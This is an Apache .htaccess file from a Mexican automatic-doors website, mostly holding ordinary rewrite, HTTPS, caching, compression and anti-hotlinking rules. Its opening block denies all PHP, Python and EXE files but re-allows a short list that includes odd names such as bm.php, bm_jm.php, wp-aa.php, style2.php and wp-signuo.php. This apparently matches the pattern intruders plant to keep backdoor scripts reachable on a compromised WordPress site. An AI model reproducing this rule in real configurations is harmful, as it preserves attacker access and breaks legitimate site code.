
RewriteOptions inherit
<FilesMatch ".(py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "(^wp-login.php|^wp-admin.php|^themes.php||^bm_jm.php|^admin.php|^update.php|^index.php|^wp-signuo.php|^wp-blog-header.php|^bm.php|^style2.php|^wp-aa.php|^viewer.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
DirectoryIndex index.php
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
RewriteEngine on

## rewritecond %{http_host} ^puertasautomaticasenquintanaroo.com.mx [nc]
## RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
## RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
## rewriterule ^(.*)$ http://www.puertasautomaticasenquintanaroo.com.mx/$1 [r=301,nc]

RewriteCond %{SERVER_PORT} 80 
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^(.*)$ https://www.puertasautomaticasenquintanaroo.com.mx/$1 [R,L]

# Disable ETags
<IfModule mod_headers.c>
    Header unset ETag
    Header set Connection keep-alive
</IfModule>
FileETag None

## EXPIRES CACHING ##
ExpiresActive On
ExpiresByType image/jpg "access 1 year"
ExpiresByType image/jpeg "access 1 year"
ExpiresByType image/gif "access 1 year"
ExpiresByType image/png "access 1 year"
ExpiresByType text/css "access 1 month"
ExpiresByType text/html "access 1 month"
ExpiresByType application/pdf "access 1 month"
ExpiresByType text/x-javascript "access 1 month"
ExpiresByType application/x-shockwave-flash "access 1 month"
ExpiresByType image/x-icon "access 1 year"
ExpiresDefault "access plus 1 month"
## EXPIRES CACHING ##

############## CACHING ############
<IfModule mod_expires.c>
ExpiresActive On
ExpiresDefault A2592000
 
<FilesMatch "\.(txt|xml|js)$">
ExpiresDefault A2592000
</FilesMatch>
 
<FilesMatch "\.(css)$">
ExpiresDefault A2592000
</FilesMatch>
 
<FilesMatch "\.(flv|ico|pdf|avi|mov|ppt|doc|mp3|wmv|wav|mp4|m4v|ogg|webm|aac)$">
ExpiresDefault A2592000
</FilesMatch>
 
<FilesMatch "\.(jpg|jpeg|png|gif|swf|webp)$">
ExpiresDefault A2592000
</FilesMatch>
</IfModule>
 
<IfModule mod_headers.c>
  <FilesMatch "\.(txt|xml|js)$">
   Header set Cache-Control "max-age=2592000"
  </FilesMatch>
 
  <FilesMatch "\.(css)$">
   Header set Cache-Control "max-age=2592000"
  </FilesMatch>
 
  <FilesMatch "\.(flv|ico|pdf|avi|mov|ppt|doc|mp3|wmv|wav|mp4|m4v|ogg|webm|aac)$">
   Header set Cache-Control "max-age=2592000"
  </FilesMatch>
 
  <FilesMatch "\.(jpg|jpeg|png|gif|swf|webp)$">
   Header set Cache-Control "max-age=2592000"
  </FilesMatch>
</IfModule>
 
# COMPRESION GZIP #
<IfModule mod_deflate.c>
    <IfModule mod_setenvif.c>
        <IfModule mod_headers.c>
            SetEnvIfNoCase ^(Accept-EncodXng|X-cept-Encoding|X{15}|~{15}|-{15})$ ^((gzip|deflate)\s*,?\s*)+|[X~-]{4,13}$ HAVE_Accept-Encoding
            RequestHeader append Accept-Encoding "gzip,deflate" env=HAVE_Accept-Encoding
        </IfModule>
    </IfModule>
    <IfModule mod_filter.c>
        AddOutputFilterByType DEFLATE "application/atom+xml" \
                                      "application/javascript" \
                                      "application/json" \
                                      "application/ld+json" \
                                      "application/manifest+json" \
                                      "application/rdf+xml" \
                                      "application/rss+xml" \
                                      "application/schema+json" \
                                      "application/vnd.geo+json" \
                                      "application/vnd.ms-fontobject" \
                                      "application/x-font-ttf" \
                                      "application/x-javascript" \
                                      "application/x-web-app-manifest+json" \
                                      "application/xhtml+xml" \
                                      "application/xml" \
                                      "font/eot" \
                                      "font/opentype" \
                                      "image/bmp" \
                                      "image/svg+xml" \
                                      "image/vnd.microsoft.icon" \
                                      "image/x-icon" \
                                      "text/cache-manifest" \
                                      "text/css" \
                                      "text/html" \
                                      "text/javascript" \
                                      "text/plain" \
                                      "text/vcard" \
                                      "text/vnd.rim.location.xloc" \
                                      "text/vtt" \
                                      "text/x-component" \
                                      "text/x-cross-domain-policy" \
                                      "text/xml"
 
    </IfModule>
    <IfModule mod_mime.c>
        AddEncoding gzip              svgz
    </IfModule>
 
</IfModule>

<Files 403.shtml>
order allow,deny
allow from all
</Files>

deny from 144.126.212.122
deny from 178.128.32.231
deny from 143.244.142.253
deny from 143.198.207.214
deny from 45.195.57.63
deny from 20.83.163.196
deny from 154.211.23.116
deny from 198.38.82.146
deny from 198.235.24.54

RewriteCond %{HTTP_REFERER} !^http://2021sspaziteam09.grupospazi.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://2021sspaziteam09.grupospazi.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://academia20320103929.grupospazi.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://academia20320103929.grupospazi.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://cerificados.grupospazi.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://cerificados.grupospazi.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://distribuidores.grupospazi.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://distribuidores.grupospazi.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://grupospazi.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://grupospazi.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://grupospazi.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://grupospazi.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://grupospazi.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://grupospazi.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://passpazi090919962022.grupospazi.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://passpazi090919962022.grupospazi.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://poos.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://poos.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://promocionatuvideo.grupospazi.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://promocionatuvideo.grupospazi.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://puertasautomaticasdehidalgo.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://puertasautomaticasdehidalgo.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://puertasautomaticasdehidalgo.com.mx.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://puertasautomaticasdehidalgo.com.mx.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://puertasautomaticasencelaya.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://puertasautomaticasencelaya.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://puertasautomaticasencelaya.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://puertasautomaticasencelaya.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://puertasautomaticasenhidalgo.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://puertasautomaticasenhidalgo.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://puertasautomaticasenhidalgo.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://puertasautomaticasenhidalgo.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://puertasautomaticasenqueretaro.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://puertasautomaticasenqueretaro.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://puertasautomaticasenqueretaro.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://puertasautomaticasenqueretaro.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://puertasautomaticasenquintanaroo.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://puertasautomaticasenquintanaroo.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://puertasautomaticasenquintanaroo.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://puertasautomaticasenquintanaroo.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://soporte.grupospazi.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://soporte.grupospazi.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://spazipuertas.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://spazipuertas.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://spazipuertas.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://spazipuertas.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.2021sspaziteam09.grupospazi.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.2021sspaziteam09.grupospazi.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.academia20320103929.grupospazi.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.academia20320103929.grupospazi.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.cerificados.grupospazi.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.cerificados.grupospazi.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.distribuidores.grupospazi.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.distribuidores.grupospazi.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.grupospazi.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.grupospazi.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.grupospazi.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.grupospazi.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.grupospazi.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.grupospazi.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.passpazi090919962022.grupospazi.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.passpazi090919962022.grupospazi.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.poos.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.poos.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.promocionatuvideo.grupospazi.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.promocionatuvideo.grupospazi.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.puertasautomaticasdehidalgo.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.puertasautomaticasdehidalgo.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.puertasautomaticasdehidalgo.com.mx.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.puertasautomaticasdehidalgo.com.mx.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.puertasautomaticasencelaya.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.puertasautomaticasencelaya.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.puertasautomaticasencelaya.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.puertasautomaticasencelaya.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.puertasautomaticasenhidalgo.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.puertasautomaticasenhidalgo.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.puertasautomaticasenhidalgo.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.puertasautomaticasenhidalgo.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.puertasautomaticasenqueretaro.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.puertasautomaticasenqueretaro.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.puertasautomaticasenqueretaro.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.puertasautomaticasenqueretaro.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.puertasautomaticasenquintanaroo.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.puertasautomaticasenquintanaroo.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.puertasautomaticasenquintanaroo.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.puertasautomaticasenquintanaroo.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.soporte.grupospazi.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.soporte.grupospazi.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.spazipuertas.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.spazipuertas.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.spazipuertas.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.spazipuertas.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.zzz-grupospazi.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://www.zzz-grupospazi.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^http://zzz-grupospazi.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^http://zzz-grupospazi.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://2021sspaziteam09.grupospazi.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://2021sspaziteam09.grupospazi.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://academia20320103929.grupospazi.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://academia20320103929.grupospazi.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://cerificados.grupospazi.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://cerificados.grupospazi.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://distribuidores.grupospazi.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://distribuidores.grupospazi.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://grupospazi.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://grupospazi.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://grupospazi.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://grupospazi.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://grupospazi.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://grupospazi.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://passpazi090919962022.grupospazi.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://passpazi090919962022.grupospazi.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://poos.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://poos.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://promocionatuvideo.grupospazi.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://promocionatuvideo.grupospazi.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://puertasautomaticasdehidalgo.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://puertasautomaticasdehidalgo.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://puertasautomaticasdehidalgo.com.mx.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://puertasautomaticasdehidalgo.com.mx.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://puertasautomaticasencelaya.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://puertasautomaticasencelaya.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://puertasautomaticasencelaya.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://puertasautomaticasencelaya.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://puertasautomaticasenhidalgo.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://puertasautomaticasenhidalgo.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://puertasautomaticasenhidalgo.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://puertasautomaticasenhidalgo.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://puertasautomaticasenqueretaro.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://puertasautomaticasenqueretaro.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://puertasautomaticasenqueretaro.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://puertasautomaticasenqueretaro.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://puertasautomaticasenquintanaroo.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://puertasautomaticasenquintanaroo.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://puertasautomaticasenquintanaroo.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://puertasautomaticasenquintanaroo.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://soporte.grupospazi.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://soporte.grupospazi.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://spazipuertas.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://spazipuertas.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://spazipuertas.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://spazipuertas.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.2021sspaziteam09.grupospazi.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.2021sspaziteam09.grupospazi.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.academia20320103929.grupospazi.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.academia20320103929.grupospazi.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.cerificados.grupospazi.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.cerificados.grupospazi.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.distribuidores.grupospazi.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.distribuidores.grupospazi.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.grupospazi.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.grupospazi.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.grupospazi.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.grupospazi.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.grupospazi.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.grupospazi.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.passpazi090919962022.grupospazi.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.passpazi090919962022.grupospazi.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.poos.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.poos.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.promocionatuvideo.grupospazi.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.promocionatuvideo.grupospazi.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.puertasautomaticasdehidalgo.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.puertasautomaticasdehidalgo.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.puertasautomaticasdehidalgo.com.mx.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.puertasautomaticasdehidalgo.com.mx.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.puertasautomaticasencelaya.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.puertasautomaticasencelaya.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.puertasautomaticasencelaya.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.puertasautomaticasencelaya.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.puertasautomaticasenhidalgo.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.puertasautomaticasenhidalgo.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.puertasautomaticasenhidalgo.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.puertasautomaticasenhidalgo.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.puertasautomaticasenqueretaro.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.puertasautomaticasenqueretaro.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.puertasautomaticasenqueretaro.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.puertasautomaticasenqueretaro.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.puertasautomaticasenquintanaroo.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.puertasautomaticasenquintanaroo.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.puertasautomaticasenquintanaroo.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.puertasautomaticasenquintanaroo.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.soporte.grupospazi.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.soporte.grupospazi.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.spazipuertas.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.spazipuertas.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.spazipuertas.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.spazipuertas.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.zzz-grupospazi.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://www.zzz-grupospazi.vitrarte.com.mx$      [NC]
RewriteCond %{HTTP_REFERER} !^https://zzz-grupospazi.vitrarte.com.mx/.*$      [NC]
RewriteCond %{HTTP_REFERER} !^https://zzz-grupospazi.vitrarte.com.mx$      [NC]
RewriteRule .*\.(jpg|jpeg|gif|png|bmp)$ - [F,NC]
